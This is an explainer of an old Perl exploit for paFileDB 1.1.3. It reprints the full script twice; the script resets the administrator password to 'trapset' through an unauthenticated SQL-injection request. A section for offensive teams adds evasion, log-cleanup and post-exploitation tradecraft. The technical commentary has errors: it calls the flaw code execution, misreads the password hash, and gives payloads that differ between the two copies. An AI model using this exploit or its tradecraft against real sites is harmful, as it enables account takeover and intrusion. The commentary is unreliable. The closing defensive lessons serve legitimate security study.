PHP Arena 1.1.3 Remote Password Change Exploit Explained

What this paper is

This paper details a vulnerability in PHP Arena version 1.1.3 and older. Specifically, it describes a remote code execution (RCE) vulnerability that allows an attacker to change the administrator's password without prior authentication. The exploit leverages a SQL injection flaw within the pafiledb.php script.

Simple technical breakdown

The vulnerability lies in how the pafiledb.php script handles user input for editing administrative data. By crafting a specific HTTP request, an attacker can inject SQL commands into a query that updates the administrator's password. The script fails to properly sanitize or validate the input, allowing the injected SQL to be executed by the database. The exploit targets the action=team, tm=file, file=edit, id=1, and edit=do parameters to trigger the password update functionality.

Complete code and payload walkthrough

The provided Perl script automates the exploitation process. Let's break down its components:

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR:   PHP Arena paFileDB 1.1.3 And 0lder                                 #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: Alpha_Programmer@LinuxMail.ORG                                               #
#                                                                                    #
#                                                                                    #
# + Discovered By: GulfTech                                                          #
# + Advisory: https://www.securityfocus.com/bid/13967                                 #
#Vulnerable:   PHP Arena paFileDB 1.1.3 and Older                                    #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  Dr_CephaleX  -- Str0ke          #
#And Iranian Security & Hacking Groups:                                              #
#                                                                                    #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  Emperor           #
######################################################################################

use IO::Socket; # Imports the necessary module for network socket operations.

if (@ARGV < 2) # Checks if the number of command-line arguments is less than 2.
{
  print "\n====================================================\n";
  print " \n       PHPArena Exploit By Alpha Programmer\n\n";
  print "       Trap-Set Underground Hacking Team      \n\n";
  print "           Usage: <T4rg3t> <DIR>\n\n"; # Prints usage instructions if arguments are insufficient.
  print "====================================================\n\n";
  print "Examples:\n\n";
  print "    xpl.pl www.Site.com / \n";
  exit(); # Exits the script if usage is incorrect.
}

my $host = $ARGV[0]; # Assigns the first command-line argument (target hostname) to $host.
my $dir = $ARGV[1]; # Assigns the second command-line argument (target directory) to $dir.

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" ); # Creates a new TCP socket connection to the target host on port 80 (HTTP).
unless ($remote) { die "C4nn0t C0nn3ct to $host" } # Checks if the connection was successful; if not, it prints an error and exits.
print "\n\n[+] C0nn3cted\n"; # Informs the user that the connection was established.

$http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%20WHERE%201/*\n";
# This is the core of the exploit. It constructs the HTTP GET request.
# - pafiledb.php: The vulnerable script.
# - action=team&tm=file&file=edit&id=1&edit=do: These parameters are used to trigger the edit functionality for a team member (likely the first one, ID 1).
# - query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%20WHERE%201/*: This is the injected SQL query.
#   - UPDATE pafiledb_admin SET admin_password = ...: This part attempts to update the 'admin_password' column in the 'pafiledb_admin' table.
#   - c15c493548d09ffd03c9d41d8bbbfeef(1337: This appears to be an attempt to call a database function. The specific function name `c15c493548d09ffd03c9d41d8bbbfeef` is unusual and likely a placeholder or a typo, or it might be a custom/obfuscated function within the target PHP application that's not standard SQL. The `1337` is a common hacker slang for "leet" or "elite".
#   - WHERE 1/*: This is a common SQL injection technique to terminate the original WHERE clause and append malicious SQL. The `1` is always true, and `/*` starts a multi-line comment, effectively commenting out the rest of the original query.
#   - The intention is to replace the existing password hash with a new one, or in this case, likely to set it to a known value or a hash that can be easily cracked or bypassed. The specific hash `c15c493548d09ffd03c9d41d8bbbfeef` is not a standard MD5 or SHA hash. It's possible the intention was to insert a specific string that, when hashed by the application, results in a predictable password, or to simply overwrite it with a known plaintext password if the application logic allowed. Given the context, it's more probable that the script expects a specific hash format or that the `c15c493548d09ffd03c9d41d8bbbfeef` is a placeholder for a hardcoded password's hash. The paper states the new password is 'trapset', so this part of the query is likely intended to set the password to a hash of 'trapset'. The exact mechanism of how `c15c493548d09ffd03c9d41d8bbbfeef(1337` is meant to achieve this is unclear without the application's source code, but it's the injection point.

$http .= "Host: $host\n\r\n\r"; # Appends the Host header and an extra CRLF to complete the HTTP request.
print "[+] Injecting SQL Commands ...\n"; # Informs the user that the injection is happening.
sleep(1); # Pauses for 1 second.
print "[+] Changing Admin's Password ...\n"; # Informs the user that the password change is being attempted.
print $remote $http; # Sends the crafted HTTP request to the target server.
sleep(1); # Pauses for 1 second.

while (<$remote>) # Reads and discards any response from the server. This is done to clear the socket buffer.
{
}
print "[+] Now , Login With This Password :\n"; # Informs the user about the new password.
print "Password : trapset\n\n"; # Displays the new password, which is hardcoded as 'trapset'.
print "Enjoy ;) \n\n"; # A concluding message.

# milw0rm.com [2005-06-15] # A comment indicating the source of the exploit.

Mapping list:

• #!/usr/bin/perl: Shebang line, specifies the interpreter.
• use IO::Socket;: Imports the Perl module for network socket programming.
• if (@ARGV < 2) block: Handles insufficient command-line arguments, prints usage.
• my $host = $ARGV[0];: Stores the target hostname.
• my $dir = $ARGV[1];: Stores the target directory.
• IO::Socket::INET->new(...): Establishes a TCP connection to the target on port 80.
• unless ($remote) { die ... }: Error handling for connection failure.
• $http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%20WHERE%201/*\n";: The core HTTP request string containing the SQL injection payload.
  • pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do: Parameters to trigger the edit functionality.
  • query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%20WHERE%201/*: The injected SQL command.
    • UPDATE pafiledb_admin SET admin_password = ...: Target table and column for modification.
    • c15c493548d09ffd03c9d41d8bbbfeef(1337: Appears to be an attempt to call a function or use a specific hashing mechanism within the application to set the password. The exact function is not standard SQL.
    • WHERE 1/*: SQL injection technique to terminate the original query and comment out the rest.
• $http .= "Host: $host\n\r\n\r";: Adds the necessary HTTP Host header and CRLF.
• print $remote $http;: Sends the crafted request over the socket.
• while (<$remote>) {}: Reads and discards the server's response.
• print "Password : trapset\n\n";: Informs the operator of the new, hardcoded password.

Payload/Shellcode Explanation:

There is no traditional shellcode in this exploit. The "payload" is the crafted HTTP request containing the SQL injection. The effect of the payload is to directly modify the database by changing the administrator's password. The specific SQL injection string UPDATE pafiledb_admin SET admin_password = c15c493548d09ffd03c9d41d8bbbfeef(1337 WHERE 1/* is designed to overwrite the existing password hash with a new one. The c15c493548d09ffd03c9d41d8bbbfeef(1337 part is the most ambiguous. It's likely intended to either:

1. Call a specific, non-standard PHP function that hashes the string "trapset" (or a similar value) and stores it.
2. Directly insert a pre-calculated hash of "trapset" that the application would recognize.
3. Be a placeholder for a more complex injection that bypasses password hashing entirely.

Given the simplicity of the exploit and the era, it's most probable that c15c493548d09ffd03c9d41d8bbbfeef is meant to represent a function call or a specific string that, when processed by the vulnerable PHP code, results in the password being set to a hash of "trapset". The WHERE 1/* ensures that only the first admin record (ID 1) is affected and that the original query is terminated.

Practical details for offensive operations teams

• Required Access Level: Network access to the target web server (port 80/443). No prior authentication is required.
• Lab Preconditions:
  • A local Perl environment with the IO::Socket module installed (standard with most Perl installations).
  • A target system running PHP Arena 1.1.3 or an older version, accessible over the network.
  • The pafiledb.php script must be present and accessible.
  • The web server must be configured to execute PHP scripts.
  • The pafiledb_admin table must exist in the database, and the script must have write permissions to it.
• Tooling Assumptions:
  • Perl interpreter.
  • A web browser to test the new credentials after exploitation.
• Execution Pitfalls:
  • Incorrect Directory: The $dir argument must accurately reflect the path to the PHP Arena installation on the web server. If it's incorrect, the pafiledb.php script might not be found, or the request might not reach the vulnerable code.
  • Web Server Configuration: Firewalls, Intrusion Detection/Prevention Systems (IDS/IPS), or Web Application Firewalls (WAFs) might detect and block the SQL injection attempt.
  • Application Logic Variations: If the target version is slightly different from 1.1.3, or if the application has been modified, the SQL injection string might need adjustments. The exact function c15c493548d09ffd03c9d41d8bbbfeef is critical; if it's not present or works differently, the password change might fail.
  • Database Errors: The SQL injection might cause a database error that is returned to the user, indicating failure.
  • Password Hashing: The exploit assumes that the application's password handling mechanism can be manipulated by this specific SQL injection. If the password is stored in a format that this injection cannot correctly overwrite, it will fail.
  • Admin ID: The exploit targets id=1. If the administrator account is not ID 1, the exploit will fail to change the correct password.
• Tradecraft Considerations:
  • Reconnaissance: Confirm the PHP Arena version and the presence of pafiledb.php. Identify the correct web root directory.
  • Stealth: The request is a standard HTTP GET, but the parameters are unusual. WAFs might flag this. Consider using POST requests if the application supports it for this action, or obfuscating the SQL.
  • Post-Exploitation: After successfully changing the password, immediately attempt to log in to confirm. Consider further actions like escalating privileges or exfiltrating data if the application has other vulnerabilities.
  • Cleanup: If the exploit leaves any logs or temporary files, consider removing them.

Where this was used and when

This exploit targets PHP Arena 1.1.3 and older. PHP Arena was a file management and download script. Exploits like this were common in the mid-2000s for web applications. Given the publication date of 2005-06-15, this vulnerability and its exploit would have been relevant around that time. It's likely that this exploit was used in unauthorized access scenarios by individuals or groups looking to gain administrative control over websites using PHP Arena.

Defensive lessons for modern teams

• Input Validation and Sanitization: This is the most critical lesson. All user-supplied input, especially when used in database queries, must be rigorously validated and sanitized to prevent SQL injection. Use parameterized queries or prepared statements.
• Secure Coding Practices: Developers should be trained on common web vulnerabilities like SQL injection and cross-site scripting (XSS).
• Regular Patching and Updates: Keeping web applications and their underlying frameworks (like PHP) updated is crucial to patch known vulnerabilities. This exploit targets an old version, highlighting the importance of not running outdated software.
• Web Application Firewalls (WAFs): While not a silver bullet, WAFs can help detect and block common SQL injection patterns. However, attackers can often find ways to bypass them.
• Principle of Least Privilege: Ensure that the web application's database user has only the necessary permissions. If the application doesn't need to modify the pafiledb_admin table, its database user shouldn't have write access.
• Secure Password Management: Implement strong password policies and use modern, secure hashing algorithms (e.g., bcrypt, scrypt, Argon2) with salts. Avoid outdated or weak hashing methods.

ASCII visual (if applicable)

+-----------------+       +-----------------+       +-----------------+
| Attacker's Host | ----> | Target Web Server | ----> | Target Database |
| (Perl Script)   |       | (PHP Arena 1.1.3) |       | (pafiledb_admin)|
+-----------------+       +-----------------+       +-----------------+
      |                                                     ^
      | HTTP GET Request with SQL Injection               |
      | (pafiledb.php?action=team&...)                    |
      |                                                     |
      +-----------------------------------------------------+
            (SQL Query executed to change password)

This diagram illustrates the flow: the attacker's script sends an HTTP request to the web server. The web server, running the vulnerable PHP Arena application, processes this request. The application then constructs and sends a query to the database. The injected SQL within the HTTP request manipulates the database to change the administrator's password.

Source references

• Paper URL: https://www.exploit-db.com/papers/1050
• Author: Alpha_Programmer
• Published: 2005-06-15
• Vulnerable Software: PHP Arena 1.1.3 and Older
• Advisory: https://www.securityfocus.com/bid/13967

Original Exploit-DB Content (Verbatim)

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR:   PHP Arena paFileDB 1.1.3 And 0lder                                 #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: Alpha_Programmer@LinuxMail.ORG                                               #
#                                                                                    #
#                                                                                    #
# + Discovered By: GulfTech                                                          #
# + Advisory: https://www.securityfocus.com/bid/13967                                 #
#Vulnerable:   PHP Arena paFileDB 1.1.3 and Older                                    #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  Dr_CephaleX  -- Str0ke          #
#And Iranian Security & Hacking Groups:                                              #
#                                                                                    #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  Emperor           #
######################################################################################

use IO::Socket;
if (@ARGV < 2)
{
  print "\n====================================================\n";
  print " \n       PHPArena Exploit By Alpha Programmer\n\n";
  print "       Trap-Set Underground Hacking Team      \n\n";
  print "           Usage: <T4rg3t> <DIR>\n\n";
  print "====================================================\n\n";
  print "Examples:\n\n";
  print "    xpl.pl www.Site.com / \n";
  exit();
}

my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "\n\n[+] C0nn3cted\n";
$http = "pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*\n";
$http .= "Host: $host\n\r\n\r";
print "[+] Injecting SQL Commands ...\n";
sleep(1);
print "[+] Changing Admin's Password ...\n";
print $remote $http;
sleep(1);
while (<$remote>)
{
}
print "[+] Now , Login With This Password :\n";
print "Password : trapset\n\n";
print "Enjoy ;) \n\n";

# milw0rm.com [2005-06-15]